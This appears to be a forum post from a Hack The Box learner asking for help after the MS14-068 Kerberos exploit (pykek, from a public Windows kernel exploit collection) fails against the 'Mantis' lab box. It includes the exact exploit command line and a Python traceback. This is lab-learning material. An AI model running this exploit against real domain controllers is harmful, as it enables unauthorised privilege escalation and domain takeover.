So I’m following the ippsec guide through for this one - quite a nice box. However when running the exploit I get errors. I’ve cloned this: git clone GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
Then from /opt/windows-kernel-exploits/MS14-068/pykek I’m running the exploit: python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d MANTIS
enter password
Then the following errors:
[+] Building AS-REQ for MANTIS… Done!
[+] Sending AS-REQ to MANTIS… Done!
[+] Receiving AS-REP from MANTIS… Done!
[+] Parsing AS-REP from MANTIS…Traceback (most recent call last):
File “ms14-068.py”, line 189, in
sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
File “ms14-068.py”, line 48, in sploit
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
File “/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py”, line 431, in decrypt_as_rep
return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)
File “/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py”, line 419, in _decrypt_rep
rep = decode(data, asn1Spec=spec)[0]
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py”, line 792, in call
stGetValueDecoder, self, substrateFun
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py”, line 55, in valueDecoder
value, _ = decodeFun(head, asn1Spec, tagSet, length)
File “/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py”, line 798, in call
‘%r not in asn1Spec: %r’ % (tagSet, asn1Spec)
pyasn1.error.PyAsn1Error: TagSet(Tag(tagClass=0, tagFormat=32, tagId=16), Tag(tagClass=64, tagFormat=32, tagId=30)) not in asn1Spec: AsRep()
Any help would be really appreciated,
Bwebzy